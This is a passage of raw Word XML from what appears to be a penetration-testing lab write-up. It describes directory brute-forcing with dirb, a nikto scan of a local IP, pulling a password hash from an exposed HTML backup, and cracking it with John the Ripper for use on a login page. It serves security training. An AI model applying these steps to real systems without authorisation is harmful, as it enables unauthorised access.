          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We have come across this beautiful web page of the developer. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Lets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> examine the page source. </w:t>
      </w:r>
      <w:r w:rsidR="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Upon investigating the page source. Nothing interesting was found. So we go for further investigation using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> http:/192.168.1.106</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7A2CB5" w14:textId="02F8BAFA" w:rsidR="00FF5479" w:rsidRDefault="00FF5479" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080610DD" wp14:editId="3DFB19FB">
            <wp:extent cx="5474874" cy="37452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97209" cy="3760539"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B29BBA0" w14:textId="7585603A" w:rsidR="00FF5479" w:rsidRDefault="00D51DD0" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5B12A65F">
          <v:rect id="Ink 13" o:spid="_x0000_s1029" style="position:absolute;margin-left:-153.15pt;margin-top:81.8pt;width:8.55pt;height:17.05pt;z-index:251661312;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" coordorigin="1,1" coordsize="1,1" filled="f" strokecolor="#fffc00" strokeweight="6mm">
            <v:stroke opacity="21845f" endcap="square"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AFwdAhYuARBYz1SK5pfFT48G+LrS4ZsiAxNIFET/+QNFrAJHAUbYBFcJAAAABQILZBkYMgqBx///&#10;D4DH//8PMwqBx///D4DH//8PChEBAkACQAo/QCOrQ71ECPA7oP==&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="76A9869A">
          <v:rect id="Ink 10" o:spid="_x0000_s1028" style="position:absolute;margin-left:127.5pt;margin-top:216.6pt;width:79.7pt;height:18.5pt;z-index:251660288;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" coordsize="2512,53" filled="f" strokecolor="#fffc00" strokeweight="6mm">
            <v:stroke opacity="21845f" endcap="square"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AJ0BHQPUATIBEFjPVIrml8VPjwb4utLhmyIDE0gURP/5A0WsAkcBRtgEVwkAAAAFAgtkGRgyCoHH&#10;//8PgMf//w8zCoHH//8PgMf//w8KUTSHQCAwCAwCAwAgMAAAQCAoFSqHSAwRhlAIDAKZHJ9oDfNX&#10;gE055DnwwIP3vgEBEiJiUJhMDNTGIr0PNm7njWuPXlF8pAo/QCP7g0y8CPA7oP==&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00FF5479" w:rsidRPr="00FF5479">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78089771" wp14:editId="1BAC9BFA">
            <wp:extent cx="4885370" cy="435967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88799" cy="4362732"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC752B0" w14:textId="5B2736A6" w:rsidR="00FF5479" w:rsidRDefault="00757D6B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="160" w:line="269" w:lineRule="auto" w:before="120"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Upon further investigation we have found several interesting pages in which we find a particular interest </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="00287C52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          </w:rPr>
          <w:t>http://192.168.1.106</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> when we try to open the link in browser we get prompted with a login pop up which requires username and password. </w:t>
      </w:r>
      <w:r w:rsidRPr="00757D6B">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37E9CF6E" wp14:editId="523BCCA8">
            <wp:extent cx="5052252" cy="322189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60635" cy="3227238"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A68748C" w14:textId="2B6363DE" w:rsidR="00757D6B" w:rsidRDefault="00391E3B" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">After trying some failed attempts with combinations of user and passwd, we can skip this for the time being and moving on to exploit the open ports. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.4  Development Server and API Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFB120B" w14:textId="06D54EA8" w:rsidR="00817148" w:rsidRDefault="00817148" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Previously we know that port 8011 is open so lets see what we can get after opening it in browser. We have come across the Development server, we can further scan this port using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4037445E" w14:textId="35AB2898" w:rsidR="00817148" w:rsidRDefault="00D51DD0" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="76B5C09C">
          <v:rect id="Ink 17" o:spid="_x0000_s1027" style="position:absolute;margin-left:284.7pt;margin-top:1.2pt;width:128.25pt;height:16.9pt;z-index:251655680;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" coordorigin="1" coordsize="4223,24" filled="f" strokecolor="#fffc00" strokeweight="6mm">
            <v:stroke opacity="21845f" endcap="square"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
            <o:ink i="AGsdA9YCMAEQWM9UiuaXxU+PBvi60uGbIgMTSBRE//kDRawCRwFG2ARXCQAAAAUCC2QZGDIKgcf/&#10;/w+Ax///DzMKgcf//w+Ax///DwofBoeAeAmDwCswfoZOlDCFMJBiYAoAESAg4npfkEDdAU==&#10;" annotation="t"/>
          </v:rect>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00817148" w:rsidRPr="00817148">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="665DE61A" wp14:editId="497C6D37">
            <wp:extent cx="5347848" cy="276798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51274" cy="2769755"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4251EC5F" w14:textId="492A120C" w:rsidR="00817148" w:rsidRDefault="00817148" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00817148">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DA36D14" wp14:editId="181DC562">
            <wp:extent cx="3766304" cy="308531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783919" cy="3099740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E034134" w14:textId="447F3D0A" w:rsidR="00817148" w:rsidRDefault="00817148" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see the API directory from the scan results and now can browse this. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60557D86" w14:textId="0D090897" w:rsidR="00F30AFA" w:rsidRDefault="00F30AFA" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30AFA">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="259F2A62" wp14:editId="74FC45A7">
            <wp:extent cx="5943600" cy="283908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839085"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9B3224" w14:textId="1CC1EA5B" w:rsidR="00F30AFA" w:rsidRDefault="00F30AFA" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see some php files and after some browsing I can see the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F30AFA">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>files_api.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">showing some errors. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56485397" w14:textId="29E13100" w:rsidR="00F30AFA" w:rsidRDefault="00F30AFA" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F30AFA">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AFB3032" wp14:editId="16ADF01C">
            <wp:extent cx="4798678" cy="264593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34386" cy="2665627"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>1.5  Web Server Scanning and Credential Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2183C6" w14:textId="3D776C0F" w:rsidR="00F30AFA" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">So now we are going to do further enumeration using automated scanning tool </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2979488D" w14:textId="5035AE86" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00717A4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00717A4C">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h http:/192.168.1.106</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">and we have found some very interesting results. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36753767" w14:textId="652E1B56" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A4C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="387540CA" wp14:editId="715F041F">
            <wp:extent cx="4771648" cy="456379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772987" cy="4565071"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DB98AC" w14:textId="6F309953" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A4C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35EF5228" wp14:editId="392F85E6">
            <wp:extent cx="4029637" cy="181000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029637" cy="1810003"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3676FE03" w14:textId="453F3E78" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Lets further check this interesting html backup in our server. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264C4C00" w14:textId="6E34BDDE" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Using curl we are able to identify a possible username and password record:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7864DBDD" w14:textId="2F38FDD5" w:rsidR="00717A4C" w:rsidRDefault="00717A4C" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00717A4C">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FDAC8BE" wp14:editId="4B6BED9A">
            <wp:extent cx="5943600" cy="9017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901700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="386E9E42" w14:textId="4BCF3925" w:rsidR="00EE1C84" w:rsidRDefault="00EE1C84" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>ecrypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> # value we can decrypt using john the ripper. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D00C0B" w14:textId="4F297DC2" w:rsidR="00EE1C84" w:rsidRDefault="00EE1C84" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE1C84">
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="304C2781" wp14:editId="247F9FFD">
            <wp:extent cx="5943600" cy="19494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949450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA54F2" w14:textId="1E777F47" w:rsidR="00EE1C84" w:rsidRDefault="00EE1C84" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:after="140" w:line="269" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully decrypted the has file using the john’s wordlist. </w:t>
      </w:r>
      <w:r w:rsidR="00921AB5">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Now we know where to apply these cracked credentials in our previously found development page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A84AE" w14:textId="38B268DB" w:rsidR="00921AB5" w:rsidRDefault="00D51DD0" w:rsidP="0087134C">
      <w:pPr>
        <w:spacing w:before="120" w:after="160"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TeXGyreAdventor" w:hAnsi="TeXGyreAdventor"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict w14:anchorId="40A9446A">
          <v:rect id="Ink 26" o:spid="_x0000_s1026" style="position:absolute;margin-left:18.6pt;margin-top:61.55pt;width:73.2pt;height:19.05pt;z-index:251663360;visibility:visible;mso-wrap-style:square;mso-wrap-distance-left:9pt;mso-wrap-distance-top:0;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:0;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text" coordorigin=",1" coordsize="2283,73" filled="f" strokecolor="#fffc00" strokeweight="6mm">
            <v:stroke opacity="21845f" endcap="square"/>
            <v:path shadowok="f" o:extrusionok="f" fillok="f" insetpenok="f"/>
            <o:lock v:ext="edit" rotation="t" text="t"/>
